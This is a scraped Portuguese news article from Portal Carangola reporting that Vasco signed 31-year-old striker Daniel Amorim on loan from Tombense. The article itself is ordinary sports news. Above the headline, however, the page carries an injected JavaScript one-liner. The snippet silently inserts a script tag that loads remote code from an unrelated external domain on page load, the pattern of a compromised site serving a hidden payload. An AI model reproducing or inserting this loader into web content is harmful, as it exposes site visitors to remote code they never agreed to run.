;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vasco acerta a contratação do atacante Daniel Amorim do Tombense. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Vasco acerta a contratação do atacante Daniel Amorim do Tombense.

Daniel Amorim foi destaque da Tombense no Campeonato Mineiro — Foto: Victor Souza/Tombense

Centroavante de 1,91m foi um dos destaques do Tombense, semifinalista do Campeonato Mineiro. Ele chega por empréstimo até dezembro.

O Vasco anunciou a contratação do atacante Daniel Amorim, do Tombense. O centroavante, de 31 anos, é o nono reforço do clube para temporada. Ele se destacou na equipe mineira e chamou a atenção quando enfrentou a equipe de Marcelo Cabo, na segunda fase da Copa do Brasil. Na ocasião, o time carioca venceu por 2 a 1 e passou de fase.

Daniel Amorim chega emprestado pelo Tombense até dezembro.

Na semana passada, em entrevista coletiva, o diretor de futebol Alexandre Pássaro disse que o clube monitorava o mercado por um centroavante forte no jogo aéreo, uma vez que a comissão técnica detectou essa carência no elenco. Cano e Tiago Reis não têm a bola aérea como característica. Daniel Amorim tem 1,91m, é bom no cabeceio e foi semifinalista do Campeonato Mineiro com a Tombense.

Nascido no Rio de Janeiro, Daniel Amorim foi revelado pelo Marília e passou por vários clubes, como CRB, Paysandu e Avaí. Na Ressacada, entre 2019 e 2020, ele marcou 16 gols em 22 jogos como titular, sendo artilheiro do Campeonato Catarinense de 2019 e um dos goleadores da Copa do Brasil no mesmo ano. Naquela temporada, ele também marcou contra o Vasco pelo Brasileirão. Em 2021, pela Tombense, foram seis gols em sete jogos.

Daniel é o nono reforço do Vasco para 2021. Antes dele chegaram Vanderlei, Ernando, Zeca, Romulo, Marquinhos Gabriel, Morato, Léo Jabá e Sarrafiore.

 

Informação: Redação do ge — Rio de Janeiro

 

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.